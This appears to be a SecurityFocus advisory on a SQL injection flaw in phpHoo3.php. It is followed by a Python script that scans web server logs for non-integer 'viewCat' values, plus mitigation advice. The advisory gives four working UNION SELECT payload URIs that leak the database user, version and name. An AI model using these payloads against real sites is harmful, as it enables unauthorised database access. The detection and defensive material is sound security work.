phpHoo3 'phpHoo3.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,CONVERT(CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())+using+latin1),0,0,0,0,0--
http://www.example.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,user(),@@version,0,0,0,0,0--
http://www.example.com/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())--
http://www.example.com/phpHoo/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())--
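
For detection, requests like the ones above can be found in web server logs by checking every 'viewCat' value sent to 'phpHoo3.php' against an allow-list. The following is an added example, not part of the original advisory or of phpHoo3. It assumes Apache-style access log lines and that a legitimate 'viewCat' is always a non-negative integer category id. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCRIPT = "phpHoo3.php"   # script named in the advisory
PARAM = "viewCat"        # parameter used in the example URIs
# Assumption: a legitimate category id is a plain non-negative integer.
VALID_VALUE = re.compile(r"[0-9]+")
# Apache common/combined log format: client, identity, user, [time], "request"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Constructed sample log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /phpHoo3.php?viewCat=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,0,user(),@@version,0,0,0,0,0-- HTTP/1.1" 200 4096',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /phpHoo/phpHoo3.php?viewCat=-1+UNION+SELECT+0,0,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE())-- HTTP/1.1" 200 4101',
    '198.51.100.7 - - [01/Jan/2010:10:01:00 +0000] "GET /search.php?viewCat=abc HTTP/1.1" 200 900',
    'truncated or malformed line',
]

def suspicious_requests(lines):
    """Return (client_ip, decoded_value) for each viewCat value sent to
    phpHoo3.php that is not a plain integer."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        url = urlsplit(match.group("target"))
        if not url.path.endswith("/" + SCRIPT):
            continue  # only the script named in the advisory is checked
        # parse_qs decodes '+' and %XX, so encoded values are compared
        # in their decoded form.
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
        for value in values:
            if not VALID_VALUE.fullmatch(value):
                hits.append((match.group("ip"), value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\t{PARAM}={value!r}")
```

The same integer-only rule applies as a mitigation: the application should reject or cast 'viewCat' before it reaches the SQL query, and build the query with bound parameters.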


 

Copyright 2010, SecurityFocus